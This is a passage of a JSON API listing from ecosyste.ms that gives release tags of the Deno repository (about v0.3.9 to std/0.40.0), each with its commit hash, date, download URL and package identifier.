os.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependenc